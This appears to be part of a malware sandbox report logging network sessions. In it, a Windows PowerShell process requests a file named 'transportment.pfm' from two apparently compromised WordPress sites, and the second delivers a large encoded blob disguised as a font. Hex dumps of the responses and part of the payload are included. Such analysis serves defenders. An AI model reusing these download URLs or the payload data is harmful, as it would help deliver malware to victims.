                                                        2024-07-26 13:11:16 UTC14994INData Raw: 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 73 6f 63 69 61 74 69 61 74 72 61 64 69 74 69 69 6d 61 72 69 61 2e 72 6f 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 36 2e 31 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54
                                                        Data Ascii: /core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/asociatiatraditiimaria.ro\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportT
                                                        2024-07-26 13:11:16 UTC16384INData Raw: 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 3e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75
                                                        Data Ascii: lock-button.is-style-outline .wp-block-button__link:hover,.wp-block-buttons .wp-block-button.is-style-outline .wp-block-button__link:focus,.wp-block-buttons .wp-block-button.is-style-outline > .wp-block-button__link:not(.has-text-color):hover,.wp-block-bu
                                                        2024-07-26 13:11:16 UTC16384INData Raw: 74 68 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 63 75 73 74 6f 6d 2d 2d 61 73 74 2d 77 69 64 65 2d 77 69 64 74 68 2d 73 69 7a 65 29 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 2e 61 6c 69 67 6e 66 75 6c 6c 20 7b 6d 61 78 2d 77 69 64 74 68 3a 20 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 7d 62 6c 6f 63 6b 71 75 6f 74 65 20 7b 6d 61 72 67 69 6e 3a 20 31 2e 35 65 6d 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69
                                                        Data Ascii: th: var(--wp--custom--ast-wide-width-size);}.entry-content[ast-blocks-layout] .alignfull {max-width: none;}.entry-content .wp-block-columns {margin-bottom: 0;}blockquote {margin: 1.5em;border-color: rgba(0,0,0,0.05);}.wp-block-quote:not(.has-text-align-ri
                                                        2024-07-26 13:11:16 UTC16384INData Raw: 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 69 74 65 2d 63 6f 6e 74 65 6e 74 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 63 68 69 76 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 2d 72 65 73 70 6f 6e 64 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 61 73 74 2d 63 6f 6d 6d 65 6e 74 2d 6c 69 73 74 20 6c 69 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 73 2d 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                        Data Ascii: -container .site-content,.ast-separate-container .ast-archive-description,.ast-separate-container .comments-area .comment-respond,.ast-separate-container .comments-area .ast-comment-list li,.ast-separate-container .comments-area .comments-title{background
                                                        2024-07-26 13:11:16 UTC16384INData Raw: 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69
                                                        Data Ascii: ayout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-i
                                                        2024-07-26 13:11:16 UTC16384INData Raw: 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 32 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 33 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 34 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 7d 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d
                                                        Data Ascii: ate-container .ast-grid-2 .ast-article-post.ast-separate-posts,.ast-separate-container .ast-grid-3 .ast-article-post.ast-separate-posts,.ast-separate-container .ast-grid-4 .ast-article-post.ast-separate-posts{border-bottom:0;}.ast-separate-container .ast-


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        1192.168.2.224917293.113.54.564433604C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-26 13:11:21 UTC71OUTGET /os/transportment.pfm HTTP/1.1
                                                        Host: asociatiatraditiimaria.ro
                                                        2024-07-26 13:11:22 UTC340INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                        content-type: text/html; charset=UTF-8
                                                        link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/"
                                                        transfer-encoding: chunked
                                                        date: Fri, 26 Jul 2024 13:11:22 GMT
                                                        server: LiteSpeed
                                                        2024-07-26 13:11:22 UTC1028INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 73 6f 63 69 61 c8 9b 69 61 20 54 72 61 64 69 c8 9b 69 69
                                                        Data Ascii: 10000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Page not found &#8211; Asociaia Tradiii
                                                        2024-07-26 13:11:22 UTC14994INData Raw: 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b
                                                        Data Ascii: auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);
                                                        2024-07-26 13:11:22 UTC16384INData Raw: 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 3e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76
                                                        Data Ascii: tyle-outline > .wp-block-button__link:not(.has-text-color):hover,.wp-block-buttons .wp-block-button.wp-block-button__link.is-style-outline:not(.has-text-color):hover{color:var(--ast-global-color-5);background-color:var(--ast-global-color-0);border-color:v
                                                        2024-07-26 13:11:22 UTC16384INData Raw: 20 31 2e 35 65 6d 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 29 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 29 20 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 35 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 20 3e 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 20 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 35 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c
                                                        Data Ascii: 1.5em;border-color: rgba(0,0,0,0.05);}.wp-block-quote:not(.has-text-align-right):not(.has-text-align-center) {border-left: 5px solid rgba(0,0,0,0.05);}.has-text-align-right > blockquote,blockquote.has-text-align-right {border-right: 5px solid rgba(0,0,0,
                                                        2024-07-26 13:11:22 UTC16384INData Raw: 65 6e 74 2d 6c 69 73 74 20 6c 69 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 73 2d 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 3b 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 32 31 70 78 29 7b 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 73 69 6e 67 6c 65 3a 6e 6f 74 28 2e 61 73 74 2d 72 65 6c 61 74 65 64 2d 70 6f 73 74 29 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f
                                                        Data Ascii: ent-list li,.ast-separate-container .comments-area .comments-title{background-color:var(--ast-global-color-5);;background-image:none;;}@media (max-width:921px){.ast-separate-container .ast-article-single:not(.ast-related-post),.woocommerce.ast-separate-co
                                                        2024-07-26 13:11:22 UTC16384INData Raw: 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e
                                                        Data Ascii: s-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-constrained > .aligncenter{margin-left: auto !importan
                                                        2024-07-26 13:11:22 UTC16384INData Raw: 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 7d 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 32 20 3e 20 2e 73 69 74 65 2d 6d 61 69 6e 20 3e 20 2e 61 73 74 2d 72 6f 77 3a 62 65 66 6f 72 65 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 32 20 3e 20 2e 73 69 74 65 2d 6d 61 69 6e 20 3e 20 2e 61 73 74 2d 72 6f 77 3a 61 66 74 65 72 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 33 20 3e 20 2e 73 69 74 65 2d 6d 61 69 6e 20 3e 20 2e 61 73 74 2d 72 6f 77 3a 62 65 66 6f 72 65 2c 2e 61 73 74 2d 73 65
                                                        Data Ascii: rticle-post.ast-separate-posts{border-bottom:0;}.ast-separate-container .ast-grid-2 > .site-main > .ast-row:before,.ast-separate-container .ast-grid-2 > .site-main > .ast-row:after,.ast-separate-container .ast-grid-3 > .site-main > .ast-row:before,.ast-se


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.224917334.166.62.1904433604C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-07-26 13:11:28 UTC107OUTGET /wp-admin/oserve/transportment.pfm HTTP/1.1
                                                        Host: new.quranushaiqer.org.sa
                                                        Connection: Keep-Alive
                                                        2024-07-26 13:11:28 UTC396INHTTP/1.1 200 OK
                                                        Server: nginx/1.26.1
                                                        Date: Fri, 26 Jul 2024 13:11:28 GMT
                                                        Content-Type: application/x-font-type1
                                                        Content-Length: 519984
                                                        Connection: close
                                                        Last-Modified: Mon, 08 Jul 2024 02:08:54 GMT
                                                        ETag: "7ef30-61cb2e520d854"
                                                        Accept-Ranges: bytes
                                                        X-Cache: HIT from Backend
                                                        Strict-Transport-Security: max-age=31536000
                                                        X-XSS-Protection: 1; mode=block
                                                        X-Content-Type-Options: nosniff
                                                        2024-07-26 13:11:28 UTC15988INData Raw: 32 63 6e 59 77 75 74 45 2b 59 64 53 59 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 54 70 72 77 41 41 41 4e 6e 2f 68 38 6e 72 58 76 71 6a 4a 6b 32 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 55 66 4a 64 37 6b 6d 39 76 69 36 30 49 6e 4b 34 56
                                                        Data Ascii: 2cnYwutE+YdSYLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTprwAAANn/h8nrXvqjJk21tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbUfJd7km9vi60InK4V
                                                        2024-07-26 13:11:28 UTC16384INData Raw: 58 59 62 66 57 6d 54 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 74 6e 31 32 65 58 72 54 73 55 46 37 30 46 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 51 2b 42 74 41 41 41 41 4e 6a 4b 32 65 44 72 54 36 63
                                                        Data Ascii: XYbfWmT+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/tn12eXrTsUF70F1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dQ+BtAAAANjK2eDrT6c
                                                        2024-07-26 13:11:28 UTC610INData Raw: 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 77 2b 42 71 51 41 41 41 4e 6e 4a 32 65 54 72 55 4e 67 63 31 69 47 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 6d 32 59 50 63 2f 46 57 44 36 37 77 36 30 69 35 36 54 55 35 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55
                                                        Data Ascii: k5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTkw+BqQAAANnJ2eTrUNgc1iGzs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozm2YPc/FWD67w60i56TU5BQUFBQUFBQUFBQU
                                                        2024-07-26 13:11:28 UTC16384INData Raw: 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 51 2f 72 33 64 37 49 36 31 76 5a 61 2f 51 4f 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 67 63 4d 45 41 51 41 41 32 65 34 50 64 75 4c 72 54 66 54 53 65 44 37 4c 79 38 76 4c 79
                                                        Data Ascii: X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19Q/r3d7I61vZa/QOmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYgcMEAQAA2e4PduLrTfTSeD7Ly8vLy
                                                        2024-07-26 13:11:28 UTC16384INData Raw: 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 51 2f 36 78 39 76 69 36 30 78 50 2f 34 42 4b 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 4f 64 41 50 64 2f 4d 50 66 74 37 72 55 45 59 48 76 30 63 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 44 34 56 79 2b 76 2f 2f 6d
